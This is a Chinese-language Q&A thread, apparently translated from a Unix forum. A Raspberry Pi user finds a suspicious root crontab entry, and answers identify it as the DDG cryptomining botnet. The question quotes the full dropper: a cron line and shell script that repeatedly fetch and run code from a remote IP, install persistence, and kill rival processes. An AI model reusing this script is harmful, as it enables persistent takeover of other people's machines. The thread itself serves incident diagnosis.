主页 / unix / 问题 / 544811
Accepted
D__
Asked: 2019-10-03 09:25:30 +0800 CST

每 15 分钟运行一次“xribfa4”的可疑 crontab 条目

  • 772

我想在我的 Raspberry Pi 上的根 crontab 文件中添加一些内容,并发现了一个对我来说似乎可疑的条目,在 Google 上搜索它的部分内容却一无所获。

crontab 条目:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

的内容http://103.219.112.66:8000/i.sh是:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

我的 Linux 知识有限,但对我来说,从印度尼西亚服务器下载二进制文件并定期以 root 身份运行它们似乎并不常见。

这是什么?我应该怎么办?

security

2 个回答

  1. Best Answer

    这是一个DDG挖矿僵尸网络,它是如何工作的:

    1. 利用RCE漏洞
    2. 修改 crontab
    3. 下载合适的挖矿程序(用go写的)
    4. 开始采矿过程

    DDG:针对数据库服务器的挖矿僵尸网络

    SystemdMiner 当一个僵尸网络借用另一个僵尸网络的基础设施时

    U&L:如何杀死 AWS EC2 实例上的矿工恶意软件?(受损的服务器)

    • 80

  2. 找出实际需要哪些 TCP 和 UDP 端口,然后在路由器的防火墙中阻止所有其他端口。可能,那些 crontab 条目不会再次出现。

    您可以使用Shields Up!查看哪些端口是开放的和公共的!grc.com 上的功能

    如果不首先阻止未使用的端口,它可能会在他尝试修补它时再次感染。

    • 3

相关问题